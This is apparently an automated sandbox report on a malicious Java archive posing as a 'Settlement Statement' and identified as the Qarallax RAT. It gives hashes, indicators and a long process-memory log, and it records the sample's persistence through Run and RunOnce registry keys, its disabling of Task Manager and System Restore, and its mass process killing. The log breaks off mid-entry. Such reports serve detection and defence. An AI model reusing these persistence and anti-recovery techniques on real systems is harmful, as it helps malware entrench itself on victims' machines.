Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows7_x64 -
resource
win7 -
submitted
19-08-2020 13:40
Static task
static1
Behavioral task
behavioral1
Sample
Settlement Statement.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Settlement Statement.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
Settlement Statement.jar
-
Size
410KB
-
MD5
067b448f548254e2442e5c63e74f8dd9
-
SHA1
e35fb2ffd0c72c9dacdb74bcbd22762cb110d2a7
-
SHA256
4a2540d400c6c1ceb0ea0f56012631c14b5c29c00c7f9149de2d50feaa55c7c8
-
SHA512
e5928f53a2bfa6d1fdca8baee6887540eb524b2ad2ca0ef58c4bd62144ce06a87a1b9cdcef9a8882109170fa39ed9e5568823d09839daaf71ad5755249faceb0
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001353f-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1612 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File created C:\Users\Admin\hmJMe\Desktop.ini java.exe File opened for modification C:\Users\Admin\hmJMe\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\hmJMe\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\hmJMe\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\aurCh java.exe File opened for modification C:\Windows\System32\aurCh java.exe -
Kills process with taskkill 19 IoCs
pid Process 1088 taskkill.exe 1924 taskkill.exe 1280 taskkill.exe 1496 taskkill.exe 1648 taskkill.exe 1564 taskkill.exe 436 taskkill.exe 2892 taskkill.exe 268 taskkill.exe 1796 taskkill.exe 2052 taskkill.exe 2144 taskkill.exe 3008 taskkill.exe 1424 taskkill.exe 1608 taskkill.exe 2244 taskkill.exe 2432 taskkill.exe 2612 taskkill.exe 2752 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1128 powershell.exe 1128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1772 WMIC.exe Token: SeSecurityPrivilege 1772 WMIC.exe Token: SeTakeOwnershipPrivilege 1772 WMIC.exe Token: SeLoadDriverPrivilege 1772 WMIC.exe Token: SeSystemProfilePrivilege 1772 WMIC.exe Token: SeSystemtimePrivilege 1772 WMIC.exe Token: SeProfSingleProcessPrivilege 1772 WMIC.exe Token: SeIncBasePriorityPrivilege 1772 WMIC.exe Token: SeCreatePagefilePrivilege 1772 WMIC.exe Token: SeBackupPrivilege 1772 WMIC.exe Token: SeRestorePrivilege 1772 WMIC.exe Token: SeShutdownPrivilege 1772 WMIC.exe Token: SeDebugPrivilege 1772 WMIC.exe Token: SeSystemEnvironmentPrivilege 1772 WMIC.exe Token: SeRemoteShutdownPrivilege 1772 WMIC.exe Token: SeUndockPrivilege 1772 WMIC.exe Token: SeManageVolumePrivilege 1772 WMIC.exe Token: 33 1772 WMIC.exe Token: 34 1772 WMIC.exe Token: 35 1772 WMIC.exe Token: SeIncreaseQuotaPrivilege 1772 WMIC.exe Token: SeSecurityPrivilege 1772 WMIC.exe Token: SeTakeOwnershipPrivilege 1772 WMIC.exe Token: SeLoadDriverPrivilege 1772 WMIC.exe Token: SeSystemProfilePrivilege 1772 WMIC.exe Token: SeSystemtimePrivilege 1772 WMIC.exe Token: SeProfSingleProcessPrivilege 1772 WMIC.exe Token: SeIncBasePriorityPrivilege 1772 WMIC.exe Token: SeCreatePagefilePrivilege 1772 WMIC.exe Token: SeBackupPrivilege 1772 WMIC.exe Token: SeRestorePrivilege 1772 WMIC.exe Token: SeShutdownPrivilege 1772 WMIC.exe Token: SeDebugPrivilege 1772 WMIC.exe Token: SeSystemEnvironmentPrivilege 1772 WMIC.exe Token: SeRemoteShutdownPrivilege 1772 WMIC.exe Token: SeUndockPrivilege 1772 WMIC.exe Token: SeManageVolumePrivilege 1772 WMIC.exe Token: 33 1772 WMIC.exe Token: 34 1772 WMIC.exe Token: 35 1772 WMIC.exe Token: SeIncreaseQuotaPrivilege 1912 WMIC.exe Token: SeSecurityPrivilege 1912 WMIC.exe Token: SeTakeOwnershipPrivilege 1912 WMIC.exe Token: SeLoadDriverPrivilege 1912 WMIC.exe Token: SeSystemProfilePrivilege 1912 WMIC.exe Token: SeSystemtimePrivilege 1912 WMIC.exe Token: SeProfSingleProcessPrivilege 1912 WMIC.exe Token: SeIncBasePriorityPrivilege 1912 WMIC.exe Token: SeCreatePagefilePrivilege 1912 WMIC.exe Token: SeBackupPrivilege 1912 WMIC.exe Token: SeRestorePrivilege 1912 WMIC.exe Token: SeShutdownPrivilege 1912 WMIC.exe Token: SeDebugPrivilege 1912 WMIC.exe Token: SeSystemEnvironmentPrivilege 1912 WMIC.exe Token: SeRemoteShutdownPrivilege 1912 WMIC.exe Token: SeUndockPrivilege 1912 WMIC.exe Token: SeManageVolumePrivilege 1912 WMIC.exe Token: 33 1912 WMIC.exe Token: 34 1912 WMIC.exe Token: 35 1912 WMIC.exe Token: SeIncreaseQuotaPrivilege 1912 WMIC.exe Token: SeSecurityPrivilege 1912 WMIC.exe Token: SeTakeOwnershipPrivilege 1912 WMIC.exe Token: SeLoadDriverPrivilege 1912 WMIC.exe Token: SeSystemProfilePrivilege 1912 WMIC.exe Token: SeSystemtimePrivilege 1912 WMIC.exe Token: SeProfSingleProcessPrivilege 1912 WMIC.exe Token: SeIncBasePriorityPrivilege 1912 WMIC.exe Token: SeCreatePagefilePrivilege 1912 WMIC.exe Token: SeBackupPrivilege 1912 WMIC.exe Token: SeRestorePrivilege 1912 WMIC.exe Token: SeShutdownPrivilege 1912 WMIC.exe Token: SeDebugPrivilege 1912 WMIC.exe Token: SeSystemEnvironmentPrivilege 1912 WMIC.exe Token: SeRemoteShutdownPrivilege 1912 WMIC.exe Token: SeUndockPrivilege 1912 WMIC.exe Token: SeManageVolumePrivilege 1912 WMIC.exe Token: 33 1912 WMIC.exe Token: 34 1912 WMIC.exe Token: 35 1912 WMIC.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 268 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 1924 taskkill.exe Token: SeDebugPrivilege 1280 taskkill.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeDebugPrivilege 436 taskkill.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeDebugPrivilege 2144 taskkill.exe Token: SeDebugPrivilege 2244 taskkill.exe Token: SeDebugPrivilege 2432 taskkill.exe Token: SeDebugPrivilege 2612 taskkill.exe Token: SeDebugPrivilege 2752 taskkill.exe Token: SeDebugPrivilege 2892 taskkill.exe Token: SeDebugPrivilege 3008 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1612 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 1612 wrote to memory of 1824 1612 java.exe 25 PID 1612 wrote to memory of 1824 1612 java.exe 25 PID 1612 wrote to memory of 1824 1612 java.exe 25 PID 1612 wrote to memory of 1788 1612 java.exe 26 PID 1612 wrote to memory of 1788 1612 java.exe 26 PID 1612 wrote to memory of 1788 1612 java.exe 26 PID 1788 wrote to memory of 1772 1788 cmd.exe 27 PID 1788 wrote to memory of 1772 1788 cmd.exe 27 PID 1788 wrote to memory of 1772 1788 cmd.exe 27 PID 1612 wrote to memory of 1888 1612 java.exe 28 PID 1612 wrote to memory of 1888 1612 java.exe 28 PID 1612 wrote to memory of 1888 1612 java.exe 28 PID 1888 wrote to memory of 1912 1888 cmd.exe 29 PID 1888 wrote to memory of 1912 1888 cmd.exe 29 PID 1888 wrote to memory of 1912 1888 cmd.exe 29 PID 1612 wrote to memory of 1960 1612 java.exe 30 PID 1612 wrote to memory of 1960 1612 java.exe 30 PID 1612 wrote to memory of 1960 1612 java.exe 30 PID 1612 wrote to memory of 1976 1612 java.exe 31 PID 1612 wrote to memory of 1976 1612 java.exe 31 PID 1612 wrote to memory of 1976 1612 java.exe 31 PID 1612 wrote to memory of 1152 1612 java.exe 32 PID 1612 wrote to memory of 1152 1612 java.exe 32 PID 1612 wrote to memory of 1152 1612 java.exe 32 PID 1612 wrote to memory of 1984 1612 java.exe 33 PID 1612 wrote to memory of 1984 1612 java.exe 33 PID 1612 wrote to memory of 1984 1612 java.exe 33 PID 1612 wrote to memory of 1836 1612 java.exe 34 PID 1612 wrote to memory of 1836 1612 java.exe 34 PID 1612 wrote to memory of 1836 1612 java.exe 34 PID 1612 wrote to memory of 1828 1612 java.exe 35 PID 1612 wrote to memory of 1828 1612 java.exe 35 PID 1612 wrote to memory of 1828 1612 java.exe 35 PID 1612 wrote to memory of 1760 1612 java.exe 36 PID 1612 wrote to memory of 1760 1612 java.exe 36 PID 1612 wrote to memory of 1760 1612 java.exe 36 PID 1612 wrote to memory of 1660 1612 java.exe 37 PID 1612 wrote to memory of 1660 1612 java.exe 37 PID 1612 wrote to memory of 1660 1612 java.exe 37 PID 1612 wrote to memory of 1588 1612 java.exe 38 PID 1612 wrote to memory of 1588 1612 java.exe 38 PID 1612 wrote to memory of 1588 1612 java.exe 38 PID 1612 wrote to memory of 1128 1612 java.exe 40 PID 1612 wrote to memory of 1128 1612 java.exe 40 PID 1612 wrote to memory of 1128 1612 java.exe 40 PID 1588 wrote to memory of 1632 1588 cmd.exe 39 PID 1588 wrote to memory of 1632 1588 cmd.exe 39 PID 1588 wrote to memory of 1632 1588 cmd.exe 39 PID 1612 wrote to memory of 1032 1612 java.exe 41 PID 1612 wrote to memory of 1032 1612 java.exe 41 PID 1612 wrote to memory of 1032 1612 java.exe 41 PID 1612 wrote to memory of 1280 1612 java.exe 43 PID 1612 wrote to memory of 1280 1612 java.exe 43 PID 1612 wrote to memory of 1280 1612 java.exe 43 PID 1612 wrote to memory of 1424 1612 java.exe 44 PID 1612 wrote to memory of 1424 1612 java.exe 44 PID 1612 wrote to memory of 1424 1612 java.exe 44 PID 1612 wrote to memory of 876 1612 java.exe 45 PID 1612 wrote to memory of 876 1612 java.exe 45 PID 1612 wrote to memory of 876 1612 java.exe 45 PID 1612 wrote to memory of 1272 1612 java.exe 47 PID 1612 wrote to memory of 1272 1612 java.exe 47 PID 1612 wrote to memory of 1272 1612 java.exe 47 PID 1612 wrote to memory of 1572 1612 java.exe 51 PID 1612 wrote to memory of 1572 1612 java.exe 51 PID 1612 wrote to memory of 1572 1612 java.exe 51 PID 1588 wrote to memory of 1116 1588 cmd.exe 52 PID 1588 wrote to memory of 1116 1588 cmd.exe 52 PID 1588 wrote to memory of 1116 1588 cmd.exe 52 PID 1612 wrote to memory of 1500 1612 java.exe 53 PID 1612 wrote to memory of 1500 1612 java.exe 53 PID 1612 wrote to memory of 1500 1612 java.exe 53 PID 1612 wrote to memory of 332 1612 java.exe 57 PID 1612 wrote to memory of 332 1612 java.exe 57 PID 1612 wrote to memory of 332 1612 java.exe 57 PID 1612 wrote to memory of 1176 1612 java.exe 58 PID 1612 wrote to memory of 1176 1612 java.exe 58 PID 1612 wrote to memory of 1176 1612 java.exe 58 PID 1612 wrote to memory of 1044 1612 java.exe 60 PID 1612 wrote to memory of 1044 1612 java.exe 60 PID 1612 wrote to memory of 1044 1612 java.exe 60 PID 1612 wrote to memory of 588 1612 java.exe 61 PID 1612 wrote to memory of 588 1612 java.exe 61 PID 1612 wrote to memory of 588 1612 java.exe 61 PID 1612 wrote to memory of 1916 1612 java.exe 64 PID 1612 wrote to memory of 1916 1612 java.exe 64 PID 1612 wrote to memory of 1916 1612 java.exe 64 PID 1612 wrote to memory of 1416 1612 java.exe 65 PID 1612 wrote to memory of 1416 1612 java.exe 65 PID 1612 wrote to memory of 1416 1612 java.exe 65 PID 1176 wrote to memory of 1672 1176 cmd.exe 66 PID 1176 wrote to memory of 1672 1176 cmd.exe 66 PID 1176 wrote to memory of 1672 1176 cmd.exe 66 PID 1612 wrote to memory of 1944 1612 java.exe 68 PID 1612 wrote to memory of 1944 1612 java.exe 68 PID 1612 wrote to memory of 1944 1612 java.exe 68 PID 1612 wrote to memory of 1832 1612 java.exe 69 PID 1612 wrote to memory of 1832 1612 java.exe 69 PID 1612 wrote to memory of 1832 1612 java.exe 69 PID 1612 wrote to memory of 2004 1612 java.exe 72 PID 1612 wrote to memory of 2004 1612 java.exe 72 PID 1612 wrote to memory of 2004 1612 java.exe 72 PID 1176 wrote to memory of 2020 1176 cmd.exe 73 PID 1176 wrote to memory of 2020 1176 cmd.exe 73 PID 1176 wrote to memory of 2020 1176 cmd.exe 73 PID 1612 wrote to memory of 1604 1612 java.exe 75 PID 1612 wrote to memory of 1604 1612 java.exe 75 PID 1612 wrote to memory of 1604 1612 java.exe 75 PID 1612 wrote to memory of 1496 1612 java.exe 76 PID 1612 wrote to memory of 1496 1612 java.exe 76 PID 1612 wrote to memory of 1496 1612 java.exe 76 PID 1612 wrote to memory of 580 1612 java.exe 77 PID 1612 wrote to memory of 580 1612 java.exe 77 PID 1612 wrote to memory of 580 1612 java.exe 77 PID 1604 wrote to memory of 1896 1604 cmd.exe 79 PID 1604 wrote to memory of 1896 1604 cmd.exe 79 PID 1604 wrote to memory of 1896 1604 cmd.exe 79 PID 1612 wrote to memory of 1856 1612 java.exe 80 PID 1612 wrote to memory of 1856 1612 java.exe 80 PID 1612 wrote to memory of 1856 1612 java.exe 80 PID 1612 wrote to memory of 1572 1612 java.exe 83 PID 1612 wrote to memory of 1572 1612 java.exe 83 PID 1612 wrote to memory of 1572 1612 java.exe 83 PID 1604 wrote to memory of 1300 1604 cmd.exe 84 PID 1604 wrote to memory of 1300 1604 cmd.exe 84 PID 1604 wrote to memory of 1300 1604 cmd.exe 84 PID 1612 wrote to memory of 1900 1612 java.exe 85 PID 1612 wrote to memory of 1900 1612 java.exe 85 PID 1612 wrote to memory of 1900 1612 java.exe 85 PID 1612 wrote to memory of 1648 1612 java.exe 87 PID 1612 wrote to memory of 1648 1612 java.exe 87 PID 1612 wrote to memory of 1648 1612 java.exe 87 PID 1612 wrote to memory of 1504 1612 java.exe 89 PID 1612 wrote to memory of 1504 1612 java.exe 89 PID 1612 wrote to memory of 1504 1612 java.exe 89 PID 1612 wrote to memory of 836 1612 java.exe 90 PID 1612 wrote to memory of 836 1612 java.exe 90 PID 1612 wrote to memory of 836 1612 java.exe 90 PID 1612 wrote to memory of 1796 1612 java.exe 92 PID 1612 wrote to memory of 1796 1612 java.exe 92 PID 1612 wrote to memory of 1796 1612 java.exe 92 PID 1612 wrote to memory of 1088 1612 java.exe 95 PID 1612 wrote to memory of 1088 1612 java.exe 95 PID 1612 wrote to memory of 1088 1612 java.exe 95 PID 836 wrote to memory of 620 836 cmd.exe 96 PID 836 wrote to memory of 620 836 cmd.exe 96 PID 836 wrote to memory of 620 836 cmd.exe 96 PID 836 wrote to memory of 1864 836 cmd.exe 99 PID 836 wrote to memory of 1864 836 cmd.exe 99 PID 836 wrote to memory of 1864 836 cmd.exe 99 PID 1612 wrote to memory of 1984 1612 java.exe 100 PID 1612 wrote to memory of 1984 1612 java.exe 100 PID 1612 wrote to memory of 1984 1612 java.exe 100 PID 1984 wrote to memory of 1660 1984 cmd.exe 101 PID 1984 wrote to memory of 1660 1984 cmd.exe 101 PID 1984 wrote to memory of 1660 1984 cmd.exe 101 PID 1984 wrote to memory of 1824 1984 cmd.exe 102 PID 1984 wrote to memory of 1824 1984 cmd.exe 102 PID 1984 wrote to memory of 1824 1984 cmd.exe 102 PID 1612 wrote to memory of 1564 1612 java.exe 103 PID 1612 wrote to memory of 1564 1612 java.exe 103 PID 1612 wrote to memory of 1564 1612 java.exe 103 PID 1612 wrote to memory of 2032 1612 java.exe 104 PID 1612 wrote to memory of 2032 1612 java.exe 104 PID 1612 wrote to memory of 2032 1612 java.exe 104 PID 2032 wrote to memory of 2000 2032 cmd.exe 105 PID 2032 wrote to memory of 2000 2032 cmd.exe 105 PID 2032 wrote to memory of 2000 2032 cmd.exe 105 PID 2032 wrote to memory of 792 2032 cmd.exe 107 PID 2032 wrote to memory of 792 2032 cmd.exe 107 PID 2032 wrote to memory of 792 2032 cmd.exe 107 PID 1612 wrote to memory of 1848 1612 java.exe 108 PID 1612 wrote to memory of 1848 1612 java.exe 108 PID 1612 wrote to memory of 1848 1612 java.exe 108 PID 1848 wrote to memory of 892 1848 cmd.exe 109 PID 1848 wrote to memory of 892 1848 cmd.exe 109 PID 1848 wrote to memory of 892 1848 cmd.exe 109 PID 1848 wrote to memory of 1300 1848 cmd.exe 110 PID 1848 wrote to memory of 1300 1848 cmd.exe 110 PID 1848 wrote to memory of 1300 1848 cmd.exe 110 PID 1612 wrote to memory of 268 1612 java.exe 111 PID 1612 wrote to memory of 268 1612 java.exe 111 PID 1612 wrote to memory of 268 1612 java.exe 111 PID 1612 wrote to memory of 1840 1612 java.exe 112 PID 1612 wrote to memory of 1840 1612 java.exe 112 PID 1612 wrote to memory of 1840 1612 java.exe 112 PID 1840 wrote to memory of 1640 1840 cmd.exe 113 PID 1840 wrote to memory of 1640 1840 cmd.exe 113 PID 1840 wrote to memory of 1640 1840 cmd.exe 113 PID 1840 wrote to memory of 2028 1840 cmd.exe 115 PID 1840 wrote to memory of 2028 1840 cmd.exe 115 PID 1840 wrote to memory of 2028 1840 cmd.exe 115 PID 1612 wrote to memory of 860 1612 java.exe 116 PID 1612 wrote to memory of 860 1612 java.exe 116 PID 1612 wrote to memory of 860 1612 java.exe 116 PID 860 wrote to memory of 1032 860 cmd.exe 117 PID 860 wrote to memory of 1032 860 cmd.exe 117 PID 860 wrote to memory of 1032 860 cmd.exe 117 PID 860 wrote to memory of 528 860 cmd.exe 118 PID 860 wrote to memory of 528 860 cmd.exe 118 PID 860 wrote to memory of 528 860 cmd.exe 118 PID 1612 wrote to memory of 1608 1612 java.exe 119 PID 1612 wrote to memory of 1608 1612 java.exe 119 PID 1612 wrote to memory of 1608 1612 java.exe 119 PID 1612 wrote to memory of 1940 1612 java.exe 121 PID 1612 wrote to memory of 1940 1612 java.exe 121 PID 1612 wrote to memory of 1940 1612 java.exe 121 PID 1940 wrote to memory of 620 1940 cmd.exe 122 PID 1940 wrote to memory of 620 1940 cmd.exe 122 PID 1940 wrote to memory of 620 1940 cmd.exe 122 PID 1940 wrote to memory of 1368 1940 cmd.exe 123 PID 1940 wrote to memory of 1368 1940 cmd.exe 123 PID 1940 wrote to memory of 1368 1940 cmd.exe 123 PID 1612 wrote to memory of 1796 1612 java.exe 124 PID 1612 wrote to memory of 1796 1612 java.exe 124 PID 1612 wrote to memory of 1796 1612 java.exe 124 PID 1612 wrote to memory of 1584 1612 java.exe 125 PID 1612 wrote to memory of 1584 1612 java.exe 125 PID 1612 wrote to memory of 1584 1612 java.exe 125 PID 1584 wrote to memory of 1792 1584 cmd.exe 127 PID 1584 wrote to memory of 1792 1584 cmd.exe 127 PID 1584 wrote to memory of 1792 1584 cmd.exe 127 PID 1584 wrote to memory of 792 1584 cmd.exe 128 PID 1584 wrote to memory of 792 1584 cmd.exe 128 PID 1584 wrote to memory of 792 1584 cmd.exe 128 PID 1612 wrote to memory of 892 1612 java.exe 129 PID 1612 wrote to memory of 892 1612 java.exe 129 PID 1612 wrote to memory of 892 1612 java.exe 129 PID 1612 wrote to memory of 1924 1612 java.exe 130 PID 1612 wrote to memory of 1924 1612 java.exe 130 PID 1612 wrote to memory of 1924 1612 java.exe 130 PID 892 wrote to memory of 832 892 cmd.exe 131 PID 892 wrote to memory of 832 892 cmd.exe 131 PID 892 wrote to memory of 832 892 cmd.exe 131 PID 892 wrote to memory of 2032 892 cmd.exe 133 PID 892 wrote to memory of 2032 892 cmd.exe 133 PID 892 wrote to memory of 2032 892 cmd.exe 133 PID 1612 wrote to memory of 436 1612 java.exe 134 PID 1612 wrote to memory of 436 1612 java.exe 134 PID 1612 wrote to memory of 436 1612 java.exe 134 PID 436 wrote to memory of 1032 436 cmd.exe 135 PID 436 wrote to memory of 1032 436 cmd.exe 135 PID 436 wrote to memory of 1032 436 cmd.exe 135 PID 1612 wrote to memory of 1280 1612 java.exe 136 PID 1612 wrote to memory of 1280 1612 java.exe 136 PID 1612 wrote to memory of 1280 1612 java.exe 136 PID 436 wrote to memory of 1140 436 cmd.exe 137 PID 436 wrote to memory of 1140 436 cmd.exe 137 PID 436 wrote to memory of 1140 436 cmd.exe 137 PID 1612 wrote to memory of 1640 1612 java.exe 139 PID 1612 wrote to memory of 1640 1612 java.exe 139 PID 1612 wrote to memory of 1640 1612 java.exe 139 PID 1640 wrote to memory of 1792 1640 cmd.exe 140 PID 1640 wrote to memory of 1792 1640 cmd.exe 140 PID 1640 wrote to memory of 1792 1640 cmd.exe 140 PID 1640 wrote to memory of 1960 1640 cmd.exe 141 PID 1640 wrote to memory of 1960 1640 cmd.exe 141 PID 1640 wrote to memory of 1960 1640 cmd.exe 141 PID 1612 wrote to memory of 1888 1612 java.exe 142 PID 1612 wrote to memory of 1888 1612 java.exe 142 PID 1612 wrote to memory of 1888 1612 java.exe 142 PID 1888 wrote to memory of 2032 1888 cmd.exe 143 PID 1888 wrote to memory of 2032 1888 cmd.exe 143 PID 1888 wrote to memory of 2032 1888 cmd.exe 143 PID 1612 wrote to memory of 436 1612 java.exe 144 PID 1612 wrote to memory of 436 1612 java.exe 144 PID 1612 wrote to memory of 436 1612 java.exe 144 PID 1888 wrote to memory of 1480 1888 cmd.exe 146 PID 1888 wrote to memory of 1480 1888 cmd.exe 146 PID 1888 wrote to memory of 1480 1888 cmd.exe 146 PID 1612 wrote to memory of 1792 1612 java.exe 147 PID 1612 wrote to memory of 1792 1612 java.exe 147 PID 1612 wrote to memory of 1792 1612 java.exe 147 PID 1792 wrote to memory of 1140 1792 cmd.exe 148 PID 1792 wrote to memory of 1140 1792 cmd.exe 148 PID 1792 wrote to memory of 1140 1792 cmd.exe 148 PID 1792 wrote to memory of 832 1792 cmd.exe 149 PID 1792 wrote to memory of 832 1792 cmd.exe 149 PID 1792 wrote to memory of 832 1792 cmd.exe 149 PID 1612 wrote to memory of 2052 1612 java.exe 150 PID 1612 wrote to memory of 2052 1612 java.exe 150 PID 1612 wrote to memory of 2052 1612 java.exe 150 PID 1612 wrote to memory of 2064 1612 java.exe 151 PID 1612 wrote to memory of 2064 1612 java.exe 151 PID 1612 wrote to memory of 2064 1612 java.exe 151 PID 2064 wrote to memory of 2100 2064 cmd.exe 153 PID 2064 wrote to memory of 2100 2064 cmd.exe 153 PID 2064 wrote to memory of 2100 2064 cmd.exe 153 PID 2064 wrote to memory of 2116 2064 cmd.exe 154 PID 2064 wrote to memory of 2116 2064 cmd.exe 154 PID 2064 wrote to memory of 2116 2064 cmd.exe 154 PID 1612 wrote to memory of 2132 1612 java.exe 155 PID 1612 wrote to memory of 2132 1612 java.exe 155 PID 1612 wrote to memory of 2132 1612 java.exe 155 PID 1612 wrote to memory of 2144 1612 java.exe 156 PID 1612 wrote to memory of 2144 1612 java.exe 156 PID 1612 wrote to memory of 2144 1612 java.exe 156 PID 2132 wrote to memory of 2184 2132 cmd.exe 158 PID 2132 wrote to memory of 2184 2132 cmd.exe 158 PID 2132 wrote to memory of 2184 2132 cmd.exe 158 PID 2132 wrote to memory of 2208 2132 cmd.exe 159 PID 2132 wrote to memory of 2208 2132 cmd.exe 159 PID 2132 wrote to memory of 2208 2132 cmd.exe 159 PID 1612 wrote to memory of 2220 1612 java.exe 160 PID 1612 wrote to memory of 2220 1612 java.exe 160 PID 1612 wrote to memory of 2220 1612 java.exe 160 PID 2220 wrote to memory of 2232 2220 cmd.exe 161 PID 2220 wrote to memory of 2232 2220 cmd.exe 161 PID 2220 wrote to memory of 2232 2220 cmd.exe 161 PID 1612 wrote to memory of 2244 1612 java.exe 162 PID 1612 wrote to memory of 2244 1612 java.exe 162 PID 1612 wrote to memory of 2244 1612 java.exe 162 PID 2220 wrote to memory of 2264 2220 cmd.exe 164 PID 2220 wrote to memory of 2264 2220 cmd.exe 164 PID 2220 wrote to memory of 2264 2220 cmd.exe 164 PID 1612 wrote to memory of 2276 1612 java.exe 165 PID 1612 wrote to memory of 2276 1612 java.exe 165 PID 1612 wrote to memory of 2276 1612 java.exe 165 PID 2276 wrote to memory of 2292 2276 cmd.exe 166 PID 2276 wrote to memory of 2292 2276 cmd.exe 166 PID 2276 wrote to memory of 2292 2276 cmd.exe 166 PID 2276 wrote to memory of 2304 2276 cmd.exe 167 PID 2276 wrote to memory of 2304 2276 cmd.exe 167 PID 2276 wrote to memory of 2304 2276 cmd.exe 167 PID 1612 wrote to memory of 2324 1612 java.exe 168 PID 1612 wrote to memory of 2324 1612 java.exe 168 PID 1612 wrote to memory of 2324 1612 java.exe 168 PID 2324 wrote to memory of 2344 2324 cmd.exe 169 PID 2324 wrote to memory of 2344 2324 cmd.exe 169 PID 2324 wrote to memory of 2344 2324 cmd.exe 169 PID 2324 wrote to memory of 2368 2324 cmd.exe 170 PID 2324 wrote to memory of 2368 2324 cmd.exe 170 PID 2324 wrote to memory of 2368 2324 cmd.exe 170 PID 1612 wrote to memory of 2392 1612 java.exe 171 PID 1612 wrote to memory of 2392 1612 java.exe 171 PID 1612 wrote to memory of 2392 1612 java.exe 171 PID 2392 wrote to memory of 2408 2392 cmd.exe 172 PID 2392 wrote to memory of 2408 2392 cmd.exe 172 PID 2392 wrote to memory of 2408 2392 cmd.exe 172 PID 1612 wrote to memory of 2432 1612 java.exe 173 PID 1612 wrote to memory of 2432 1612 java.exe 173 PID 1612 wrote to memory of 2432 1612 java.exe 173 PID 2392 wrote to memory of 2488 2392 cmd.exe 175 PID 2392 wrote to memory of 2488 2392 cmd.exe 175 PID 2392 wrote to memory of 2488 2392 cmd.exe 175 PID 1612 wrote to memory of 2512 1612 java.exe 176 PID 1612 wrote to memory of 2512 1612 java.exe 176 PID 1612 wrote to memory of 2512 1612 java.exe 176 PID 2512 wrote to memory of 2536 2512 cmd.exe 177 PID 2512 wrote to memory of 2536 2512 cmd.exe 177 PID 2512 wrote to memory of 2536 2512 cmd.exe 177 PID 2512 wrote to memory of 2568 2512 cmd.exe 178 PID 2512 wrote to memory of 2568 2512 cmd.exe 178 PID 2512 wrote to memory of 2568 2512 cmd.exe 178 PID 1612 wrote to memory of 2592 1612 java.exe 179 PID 1612 wrote to memory of 2592 1612 java.exe 179 PID 1612 wrote to memory of 2592 1612 java.exe 179 PID 1612 wrote to memory of 2612 1612 java.exe 180 PID 1612 wrote to memory of 2612 1612 java.exe 180 PID 1612 wrote to memory of 2612 1612 java.exe 180 PID 2592 wrote to memory of 2624 2592 cmd.exe 181 PID 2592 wrote to memory of 2624 2592 cmd.exe 181 PID 2592 wrote to memory of 2624 2592 cmd.exe 181 PID 2592 wrote to memory of 2692 2592 cmd.exe 183 PID 2592 wrote to memory of 2692 2592 cmd.exe 183 PID 2592 wrote to memory of 2692 2592 cmd.exe 183 PID 1612 wrote to memory of 2704 1612 java.exe 184 PID 1612 wrote to memory of 2704 1612 java.exe 184 PID 1612 wrote to memory of 2704 1612 java.exe 184 PID 2704 wrote to memory of 2716 2704 cmd.exe 185 PID 2704 wrote to memory of 2716 2704 cmd.exe 185 PID 2704 wrote to memory of 2716 2704 cmd.exe 185 PID 2704 wrote to memory of 2732 2704 cmd.exe 186 PID 2704 wrote to memory of 2732 2704 cmd.exe 186 PID 2704 wrote to memory of 2732 2704 cmd.exe 186 PID 1612 wrote to memory of 2752 1612 java.exe 187 PID 1612 wrote to memory of 2752 1612 java.exe 187 PID 1612 wrote to memory of 2752 1612 java.exe 187 PID 1612 wrote to memory of 2784 1612 java.exe 189 PID 1612 wrote to memory of 2784 1612 java.exe 189 PID 1612 wrote to memory of 2784 1612 java.exe 189 PID 2784 wrote to memory of 2800 2784 cmd.exe 190 PID 2784 wrote to memory of 2800 2784 cmd.exe 190 PID 2784 wrote to memory of 2800 2784 cmd.exe 190 PID 2784 wrote to memory of 2816 2784 cmd.exe 191 PID 2784 wrote to memory of 2816 2784 cmd.exe 191 PID 2784 wrote to memory of 2816 2784 cmd.exe 191 PID 1612 wrote to memory of 2828 1612 java.exe 192 PID 1612 wrote to memory of 2828 1612 java.exe 192 PID 1612 wrote to memory of 2828 1612 java.exe 192 PID 2828 wrote to memory of 2852 2828 cmd.exe 193 PID 2828 wrote to memory of 2852 2828 cmd.exe 193 PID 2828 wrote to memory of 2852 2828 cmd.exe 